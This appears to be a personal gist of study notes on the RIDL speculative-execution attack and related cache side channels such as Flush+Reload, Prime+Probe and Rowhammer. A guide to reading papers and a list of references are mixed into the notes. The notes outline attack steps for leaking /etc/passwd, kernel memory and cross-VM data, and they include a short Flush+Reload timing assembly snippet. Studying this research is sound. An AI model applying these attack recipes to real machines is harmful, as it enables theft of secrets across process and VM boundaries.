dannas/ridl.md

## ridl.md

      
    Raw
  

              ridl.md
            
          
    Background

For a speculative attack, 3 conditions are needed

a cache for holding the dependent load
a timer with sufficient resolution
some branches that the hw can speculate over
If we disable out-of-order execution the problem goes away but we pay a 5-20x slowdown tax
Remove caches: 50-100x slowdown

RIDL attack


victim makes a load/store


data is put in the Line Fill Buffer


attacker makes speculative load to new page


attacker makes dependent load


time the flush reload buffer


address must be part of page aligned cache line


Line Fill Buffers


non-blocking cache
load squashing
write combining
non-temporal requests

How determine that LFB leaks?

LFB hit experiment


Kernel module
Mark empty pages in victim thread as write-back (WB), write-through (WT), write-combine (WC) and uncacheable (UC)
Use TSX
Store value to fixed memory address
Compare attack hits to lfb_hit perf counter
cross-thread gives many hits
no victim reads just zeroes
same hw thread, mostly hits

Read experiment


Initially Write known value, then in a loop read it back followed by mfence
Record hits in attacker
WB and WT don't give any hits => cache is not the leak
leaking on load => store-to-load forwarding is not the leak
If flushed, we can always read secret => cache is not the leak
WC and UC has high hit rate => points to LFB

Write experiment


In a loop, write four values to four sequenctial cache lines, followed by mfence
Record freq of retrival
Turn off Speculative Store Bypass Disable for victim and attacker
WB gives hits for last value => suggests it does write combining
If flush all give hits => points to LFB

Synchronization


Use serialization via mfence; contention and eviction for sync

Exploitation with RIDL


non SMT single core: data recently reda/written by victim before mode switch (iret, vmenter, ...)
SMT attack: data concurrently read/written by another hw thread sharing same core
diff to Meltdown/L1TF: target address can be valid, no need for invalid page fault
get data in flight: syscalls, invoke setuid binary...
targeting: sync the victim and align leaked data (repeat multiple times and filter out noise)

Cross-Process attack


example: Call passwd for leaking /etc/passwd
use filtering mask-sub-rotate(?)
use heuristics: must be ascii
align to known "root" field
recover 26 bytes in 24 hours

Cross-VM attack


two co-located VM:s running on co-located SMT:s
recover 16 bytes in 24 hours

Kernel attacks


read 0 bytes form /proc/self/maps
attacker running on sibling hw thread, could leak the first 64 bytes of victim process memory mappings
another one which does not require SMT: execute syscall and do our attack immediately after

Leaking arbitary kernel memory


if smap disabled, we can cause speculative execution in copy_from_user
call setrlimit to reach copy_from_user multiple times to train branch predictor
the speculative execution leaks memory to the LFB
the user-mode program can the recover data from the LFB

Javascript attacks


process-per-origin does not stop RIDL
Webassembly uses demand paging which we can use for the speculative load
clflush not available so FLUSH+RELOAD is out
EVICT+RELOAD works but is far more noisy since it makes extensive use of L1D
bultin high-resolution timers are disabled
they used modified browsers for their exploit, but mean that timers can be created from SharedArrayBuffer or GPU-based counters

How to read a paper
https://www.huffpost.com/entry/how-to-read-and-understand-a-scientific-paper_b_5501628
1. Read intro, not abstract (to avoid bias)
2. Identify the big question
3. Summarize background in five sentences or less
4. Identify the specific questions
5. Identify the approach
6. Read methods section
draw a diagram for each experiment
7. Read the results section
One paragraph per experiment, each figure, each table
graphs. Error bars?
sample size?
8. Do the results answer the specific question(s)
9. Conclusion/Discussion
What do the authors think?
Do you agree?
Next step? Do you agree?
10. Read the abstract.
Does it match what the author said in the paper?
Does it fit your interpretation of the paper?
11. Find out what other researchers say about the paper
Need to be able to detect if cache line is recently accessed
if clflush only flushed L1 that would be hard
since it flushes all the way to memory we can compare 1-3 cycles to 80-100 cycles
Need to be able to uniquely identify cache lines
Each cache line address has form YYYxxxBB
xxxx = set
YYY = tag
BB = address inside the block
What address
same address space or use gadgets - Spectre
same address space or privilegied - Meltdown
Any physical address - Forshadow
Buffers
Why are all these needed?
load buffer
store buffer
line fill buffer
Terminology


Covert channel is a term invented by Butler Lampson
Side-channel attacks can be many things like cache, power, memory

Flush+Reload

Works on a single cache-line
4-5 probes before it starts beeing unreliable
Two-phase attack
1. flush a cacheline using clflush
2. measure time to reload the data
Gullash et al created original.
    info on access to shared memory pages
Yuval Yarom, Katrina Falkner July 18, 2013. FLUSH+RELOAD: a High Resolution, Low Noise L3 Cache Side-Channel attack
    Improvement, cross-core since L3 is shared.
    Spy and victim can execute in pareallel on different cores
Assembly
    mfence
    rdtscp
    mov %eax, %esi
    mov (%ebx), %eax
    rdtscp
    sub %esi, %eax
    clflush 0(%ebx)

AFAICT, FLUSH+RELOAD is a general technique

1. Flush cache lines using the clflush instruction (the cache line is flushed from all caches, L1, L2, LLC)
2. wait for side effect or trigger side effect
3. measure access time of cache line with cycle counter (rdtscp). <80-100 cycles means the line has been accessed (access-time of memory).

In the old Yarov paper FLUSH+RELOAD: a High Resolution, Low Noise, L3 Cache
Side-Channel Attack; step 2 was a delay loop where it waited for the target to
access a shared page. Yarov could only detect if a cache line was hit or not,
it could not directly read the cache line content.For Spectre, step 2 consists
of the first three steps of your summary above (execute slow op; some load
happens; a FLUSH+RELOAD buf is accessed). But here the actual cache line
content of the target can be retrieved (but only one byte per iteration)?The
Yarov paper talks about the L3 cache. It's a requirement for their exploit
since they want to run the target concurrently (and on many processors only the
L3 cache is shared between cores). But the same principle is applicable to data
in L1.
Evict+Reload


Use cache contention instead of clflush
When you don't have access to clflush, like in Javascript
Replace memory by loading something else

Flush+Flush


Measures variations in clflush timing between cached and non-cached data
Daniel Gruss, Clementine Murice, Klaus Wagner, Stefan Mangard (2016). Flush+Flush: A Fast and Stealty Cache Attack

Invalidate+Transfer


Uses Flush+Reload on Intel or Evict+Reload on ARM to implement corss-package attack

Prime+Probe


The attacker occupies a cache set and measures whenever a victim replaces a line timing attach

Rowhammer


DRAM vulnerability
random bit flips by repeatedly accessing a DRAM row
some similarities to cache attacks
the accesses must bypass all levels of caches to reach DRAM and trigger bit flips

Links

https://cryptologie.net/article/367/ches-2016-tutorial-part-2-micro-architectural-side-channel-attacks/
Side Channels Attacks on Everyday applications
https://meltdownattack.com/
https://foreshadowattack.eu/
https://mdsattacks.com/
Gullasch, David, Endre Bangerter, and Stephan Krenn. "Cache games--bringing access-based cache attacks on AES to practice." 2011 IEEE Symposium on Security and Privacy. IEEE, 2011.
Yarom, Yuval, and Katrina Falkner. "FLUSH+ RELOAD: a high resolution, low noise, L3 cache side-channel attack." 23rd {USENIX} Security Symposium ({USENIX} Security 14). 2014.
Percival, Colin. "Cache missing for fun and profit." (2005): 1-13.
Bernstein, Daniel J. "Cache-timing attacks on AES." (2005): 3.
L